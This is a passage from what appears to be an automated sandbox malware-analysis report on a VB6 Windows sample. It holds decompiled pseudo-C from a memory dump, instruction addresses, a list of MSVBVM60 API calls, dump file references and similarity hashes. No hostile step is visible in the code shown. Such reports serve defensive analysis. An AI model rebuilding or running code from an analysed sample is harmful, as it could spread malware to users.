      				} else {
      					_push(0x110);
      					_push(0x4120bc);
      					_push(_a4);
      					_push(_v352);
      					L00401622();
      					_v412 = _t292;
      				}
      				if(_v344 == _v96) {
      					L0040159E();
      				}
      				if( *0x41d4b0 != 0) {
      					_v416 = 0x41d4b0;
      				} else {
      					_push(0x41d4b0);
      					_push(0x413b0c);
      					L00401628();
      					_v416 = 0x41d4b0;
      				}
      				_v352 =  *_v416;
      				_t299 =  *((intOrPtr*)( *_v352 + 0x14))(_v352,  &_v116);
      				asm("fclex");
      				_v356 = _t299;
      				if(_v356 >= 0) {
      					_v420 = _v420 & 0x00000000;
      				} else {
      					_push(0x14);
      					_push(0x413afc);
      					_push(_v352);
      					_push(_v356);
      					L00401622();
      					_v420 = _t299;
      				}
      				_v360 = _v116;
      				_t304 =  *((intOrPtr*)( *_v360 + 0xd0))(_v360,  &_v112);
      				asm("fclex");
      				_v364 = _t304;
      				if(_v364 >= 0) {
      					_v424 = _v424 & 0x00000000;
      				} else {
      					_push(0xd0);
      					_push(0x413fd0);
      					_push(_v360);
      					_push(_v364);
      					L00401622();
      					_v424 = _t304;
      				}
      				_v380 = _v112;
      				_v112 = _v112 & 0x00000000;
      				L0040162E();
      				L004015D4();
      				if( *0x41d4b0 != 0) {
      					_v428 = 0x41d4b0;
      				} else {
      					_push(0x41d4b0);
      					_push(0x413b0c);
      					L00401628();
      					_v428 = 0x41d4b0;
      				}
      				_v352 =  *_v428;
      				_t311 =  *((intOrPtr*)( *_v352 + 0x14))(_v352,  &_v116);
      				asm("fclex");
      				_v356 = _t311;
      				if(_v356 >= 0) {
      					_v432 = _v432 & 0x00000000;
      				} else {
      					_push(0x14);
      					_push(0x413afc);
      					_push(_v352);
      					_push(_v356);
      					L00401622();
      					_v432 = _t311;
      				}
      				_v360 = _v116;
      				_t316 =  *((intOrPtr*)( *_v360 + 0xc8))(_v360,  &_v344);
      				asm("fclex");
      				_v364 = _t316;
      				if(_v364 >= 0) {
      					_v436 = _v436 & 0x00000000;
      				} else {
      					_push(0xc8);
      					_push(0x413fd0);
      					_push(_v360);
      					_push(_v364);
      					L00401622();
      					_v436 = _t316;
      				}
      				_v76 = _v344;
      				L004015D4();
      				_push(0x72a4);
      				_t318 =  &_v244;
      				_push(_t318);
      				L00401490();
      				_push(_t318);
      				L00401496();
      				_v352 =  ~(0 | _t318 != 0x0000ffff);
      				L0040160A();
      				if(_v352 != 0) {
      					if( *0x41d4b0 != 0) {
      						_v440 = 0x41d4b0;
      					} else {
      						_push(0x41d4b0);
      						_push(0x413b0c);
      						L00401628();
      						_v440 = 0x41d4b0;
      					}
      					_v352 =  *_v440;
      					_t327 =  *((intOrPtr*)( *_v352 + 0x1c))(_v352,  &_v116);
      					asm("fclex");
      					_v356 = _t327;
      					if(_v356 >= 0) {
      						_v444 = _v444 & 0x00000000;
      					} else {
      						_push(0x1c);
      						_push(0x413afc);
      						_push(_v352);
      						_push(_v356);
      						L00401622();
      						_v444 = _t327;
      					}
      					_v360 = _v116;
      					_v236 = 0x80020004;
      					_v244 = 0xa;
      					L004013D0();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t333 =  *((intOrPtr*)( *_v360 + 0x5c))(_v360, 0x10,  &_v112);
      					asm("fclex");
      					_v364 = _t333;
      					if(_v364 >= 0) {
      						_v448 = _v448 & 0x00000000;
      					} else {
      						_push(0x5c);
      						_push(0x413bec);
      						_push(_v360);
      						_push(_v364);
      						L00401622();
      						_v448 = _t333;
      					}
      					_v384 = _v112;
      					_v112 = _v112 & 0x00000000;
      					L0040162E();
      					L004015D4();
      				}
      				_v56 = 0x125609;
      				asm("wait");
      				_push(0x41af2e);
      				_v348 =  &_v48;
      				_t321 =  &_v348;
      				_push(_t321);
      				_push(0);
      				L00401586();
      				L0040161C();
      				L0040161C();
      				L0040161C();
      				L0040161C();
      				return _t321;
      			}



















































































      0x0041a6be
      0x0041a6c1
      0x0041a6d0
      0x0041a6dc
      0x0041a6e4
      0x0041a6e7
      0x0041a6ee
      0x0041a6fd
      0x0041a700
      0x0041a702
      0x0041a70a
      0x0041a70b
      0x0041a717
      0x0041a734
      0x0041a719
      0x0041a719
      0x0041a71e
      0x0041a723
      0x0041a728
      0x0041a728
      0x0041a746
      0x0041a75e
      0x0041a761
      0x0041a763
      0x0041a770
      0x0041a792
      0x0041a772
      0x0041a772
      0x0041a774
      0x0041a779
      0x0041a77f
      0x0041a785
      0x0041a78a
      0x0041a78a
      0x0041a79c
      0x0041a7b7
      0x0041a7bd
      0x0041a7bf
      0x0041a7cc
      0x0041a7f1
      0x0041a7ce
      0x0041a7ce
      0x0041a7d3
      0x0041a7d8
      0x0041a7de
      0x0041a7e4
      0x0041a7e9
      0x0041a7e9
      0x0041a809
      0x0041a813
      0x0041a818
      0x0041a821
      0x0041a823
      0x0041a825
      0x0041a82a
      0x0041a82a
      0x0041a82d
      0x0041a830
      0x0041a831
      0x0041a836
      0x0041a83c
      0x0041a84b
      0x0041a84d
      0x0041a857
      0x0041a86a
      0x0041a86f
      0x0041a871
      0x0041a874
      0x0041a875
      0x0041a87a
      0x0041a880
      0x0041a880
      0x0041a885
      0x0041a893
      0x0041a89e
      0x0041a8a3
      0x0041a895
      0x0041a895
      0x0041a895
      0x0041a8a9
      0x0041a8b8
      0x0041a8bb
      0x0041a8c5
      0x0041a8cc
      0x0041a8d7
      0x0041a8dc
      0x0041a8ce
      0x0041a8ce
      0x0041a8ce
      0x0041a8e8
      0x0041a8f1
      0x0041a8f7
      0x0041a8fd
      0x0041a903
      0x0041a904
      0x0041a905
      0x0041a908
      0x0041a90a
      0x0041a90b
      0x0041a90c
      0x0041a915
      0x0041a916
      0x0041a91b
      0x0041a920
      0x0041a926
      0x0041a928
      0x0041a929
      0x0041a92f
      0x0041a939
      0x0041a943
      0x0041a94d
      0x0041a957
      0x0041a961
      0x0041a96b
      0x0041a975
      0x0041a97f
      0x0041a989
      0x0041a993
      0x0041a99d
      0x0041a9a7
      0x0041a9b1
      0x0041a9c4
      0x0041a9cf
      0x0041a9d6
      0x0041a9dd
      0x0041a9e4
      0x0041a9eb
      0x0041a9f2
      0x0041a9f6
      0x0041a9f7
      0x0041aa01
      0x0041aa0c
      0x0041aa13
      0x0041aa1a
      0x0041aa21
      0x0041aa28
      0x0041aa2f
      0x0041aa33
      0x0041aa34
      0x0041aa36
      0x0041aa3b
      0x0041aa3b
      0x0041aa3e
      0x0041aa45
      0x0041aa57
      0x0041aa63
      0x0041aa6d
      0x0041aa7f
      0x0041aa91
      0x0041aa97
      0x0041aa99
      0x0041aaa6
      0x0041aac8
      0x0041aaa8
      0x0041aaa8
      0x0041aaad
      0x0041aab2
      0x0041aab5
      0x0041aabb
      0x0041aac0
      0x0041aac0
      0x0041aade
      0x0041aae4
      0x0041aae6
      0x0041aaf3
      0x0041ab15
      0x0041aaf5
      0x0041aaf5
      0x0041aafa
      0x0041aaff
      0x0041ab02
      0x0041ab08
      0x0041ab0d
      0x0041ab0d
      0x0041ab27
      0x0041ab29
      0x0041ab29
      0x0041ab35
      0x0041ab52
      0x0041ab37
      0x0041ab37
      0x0041ab3c
      0x0041ab41
      0x0041ab46
      0x0041ab46
      0x0041ab64
      0x0041ab7c
      0x0041ab7f
      0x0041ab81
      0x0041ab8e
      0x0041abb0
      0x0041ab90
      0x0041ab90
      0x0041ab92
      0x0041ab97
      0x0041ab9d
      0x0041aba3
      0x0041aba8
      0x0041aba8
      0x0041abba
      0x0041abd2
      0x0041abd8
      0x0041abda
      0x0041abe7
      0x0041ac0c
      0x0041abe9
      0x0041abe9
      0x0041abee
      0x0041abf3
      0x0041abf9
      0x0041abff
      0x0041ac04
      0x0041ac04
      0x0041ac16
      0x0041ac1c
      0x0041ac29
      0x0041ac31
      0x0041ac3d
      0x0041ac5a
      0x0041ac3f
      0x0041ac3f
      0x0041ac44
      0x0041ac49
      0x0041ac4e
      0x0041ac4e
      0x0041ac6c
      0x0041ac84
      0x0041ac87
      0x0041ac89
      0x0041ac96
      0x0041acb8
      0x0041ac98
      0x0041ac98
      0x0041ac9a
      0x0041ac9f
      0x0041aca5
      0x0041acab
      0x0041acb0
      0x0041acb0
      0x0041acc2
      0x0041acdd
      0x0041ace3
      0x0041ace5
      0x0041acf2
      0x0041ad17
      0x0041acf4
      0x0041acf4
      0x0041acf9
      0x0041acfe
      0x0041ad04
      0x0041ad0a
      0x0041ad0f
      0x0041ad0f
      0x0041ad25
      0x0041ad2c
      0x0041ad31
      0x0041ad36
      0x0041ad3c
      0x0041ad3d
      0x0041ad42
      0x0041ad43
      0x0041ad53
      0x0041ad60
      0x0041ad6e
      0x0041ad7b
      0x0041ad98
      0x0041ad7d
      0x0041ad7d
      0x0041ad82
      0x0041ad87
      0x0041ad8c
      0x0041ad8c
      0x0041adaa
      0x0041adc2
      0x0041adc5
      0x0041adc7
      0x0041add4
      0x0041adf6
      0x0041add6
      0x0041add6
      0x0041add8
      0x0041addd
      0x0041ade3
      0x0041ade9
      0x0041adee
      0x0041adee
      0x0041ae00
      0x0041ae06
      0x0041ae10
      0x0041ae21
      0x0041ae2e
      0x0041ae2f
      0x0041ae30
      0x0041ae31
      0x0041ae40
      0x0041ae43
      0x0041ae45
      0x0041ae52
      0x0041ae74
      0x0041ae54
      0x0041ae54
      0x0041ae56
      0x0041ae5b
      0x0041ae61
      0x0041ae67
      0x0041ae6c
      0x0041ae6c
      0x0041ae7e
      0x0041ae84
      0x0041ae91
      0x0041ae99
      0x0041ae99
      0x0041ae9e
      0x0041aea5
      0x0041aea6
      0x0041aef9
      0x0041aeff
      0x0041af05
      0x0041af06
      0x0041af08
      0x0041af10
      0x0041af18
      0x0041af20
      0x0041af28
      0x0041af2d

      APIs
      • __vbaChkstk.MSVBVM60(?,004013D6), ref: 0041A6DC
      • __vbaAryConstruct2.MSVBVM60(?,00414198,00000005,?,?,?,?,004013D6), ref: 0041A70B
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,?,00414198,00000005,?,?,?,?,004013D6), ref: 0041A723
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413AFC,00000014), ref: 0041A785
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413FD0,00000100), ref: 0041A7E4
      • __vbaFreeObj.MSVBVM60(00000000,?,00413FD0,00000100), ref: 0041A813
      • #570.MSVBVM60(0000000B), ref: 0041A825
      • __vbaSetSystemError.MSVBVM60(?), ref: 0041A83C
      • __vbaVarDup.MSVBVM60(?), ref: 0041A86A
      • #600.MSVBVM60(?,00000002,?), ref: 0041A875
      • __vbaFreeVar.MSVBVM60(?,00000002,?), ref: 0041A880
      • __vbaGenerateBoundsError.MSVBVM60(?), ref: 0041A89E
      • __vbaGenerateBoundsError.MSVBVM60(?), ref: 0041A8D7
      • #683.MSVBVM60(001B2321,?,?,?,?,?), ref: 0041A916
      • __vbaFpR8.MSVBVM60(001B2321,?,?,?,?,?), ref: 0041A91B
      • __vbaVarDup.MSVBVM60(001B2321,?,?,?,?,?), ref: 0041A9C4
      • #596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,001B2321,?,?,?,?,?), ref: 0041A9F7
      • __vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,001B2321,?,?,?,?,?), ref: 0041AA01
      • __vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,001B2321), ref: 0041AA36
      • #613.MSVBVM60(?,00000002,001B2321,?,?,?,?,?), ref: 0041AA57
      • __vbaStrVarMove.MSVBVM60(?,?,00000002,001B2321,?,?,?,?,?), ref: 0041AA63
      • __vbaStrMove.MSVBVM60(?,?,00000002,001B2321,?,?,?,?,?), ref: 0041AA6D
      • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,001B2321,?,?,?,?,?), ref: 0041AA7F
      • __vbaHresultCheckObj.MSVBVM60(00000000,004012B0,004120BC,00000114), ref: 0041AABB
      • __vbaHresultCheckObj.MSVBVM60(00000000,004012B0,004120BC,00000110), ref: 0041AB08
      • __vbaEnd.MSVBVM60(00000000,004012B0,004120BC,00000110), ref: 0041AB29
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0), ref: 0041AB41
      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00413AFC,00000014), ref: 0041ABA3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413FD0,000000D0), ref: 0041ABFF
      • __vbaStrMove.MSVBVM60(00000000,?,00413FD0,000000D0), ref: 0041AC29
      • __vbaFreeObj.MSVBVM60(00000000,?,00413FD0,000000D0), ref: 0041AC31
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0), ref: 0041AC49
      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00413AFC,00000014), ref: 0041ACAB
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413FD0,000000C8), ref: 0041AD0A
      • __vbaFreeObj.MSVBVM60(00000000,?,00413FD0,000000C8), ref: 0041AD2C
      • __vbaVarErrI4.MSVBVM60(?,000072A4), ref: 0041AD3D
      • #559.MSVBVM60(00000000,?,000072A4), ref: 0041AD43
      • __vbaFreeVar.MSVBVM60(00000000,?,000072A4), ref: 0041AD60
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,00000000,?,000072A4), ref: 0041AD87
      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00413AFC,0000001C), ref: 0041ADE9
      • __vbaChkstk.MSVBVM60(00000000), ref: 0041AE21
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413BEC,0000005C), ref: 0041AE67
      • __vbaStrMove.MSVBVM60(00000000,?,00413BEC,0000005C), ref: 0041AE91
      • __vbaFreeObj.MSVBVM60(00000000,?,00413BEC,0000005C), ref: 0041AE99
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041AF2E,00000000,?,000072A4), ref: 0041AF08
      • __vbaFreeStr.MSVBVM60(00000000,?,0041AF2E,00000000,?,000072A4), ref: 0041AF10
      • __vbaFreeStr.MSVBVM60(00000000,?,0041AF2E,00000000,?,000072A4), ref: 0041AF18
      • __vbaFreeStr.MSVBVM60(00000000,?,0041AF2E,00000000,?,000072A4), ref: 0041AF20
      • __vbaFreeStr.MSVBVM60(00000000,?,0041AF2E,00000000,?,000072A4), ref: 0041AF28
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID: __vba$Free$CheckHresult$Move$New2$Error$BoundsChkstkGenerateList$#559#570#596#600#613#683Construct2DestructSystem
      • String ID: Overblind$frafrsel
      • API String ID: 1804456843-1069537042
      • Opcode ID: f205a87853e50967a81fcc69637a26a442888d69f07db0836ac81e13f3628ac9
      • Instruction ID: 274120e5e53c6a9fe5b1b99d3e8eded04190b4a2cf4899c8f519b585c76d32bd
      • Opcode Fuzzy Hash: f205a87853e50967a81fcc69637a26a442888d69f07db0836ac81e13f3628ac9
      • Instruction Fuzzy Hash: E822D170900628EFDB21DF51CC49BDEB7B4BF09309F1040EAE109BA2A1DB795A95CF59
      Uniqueness

      Uniqueness Score: -1.00%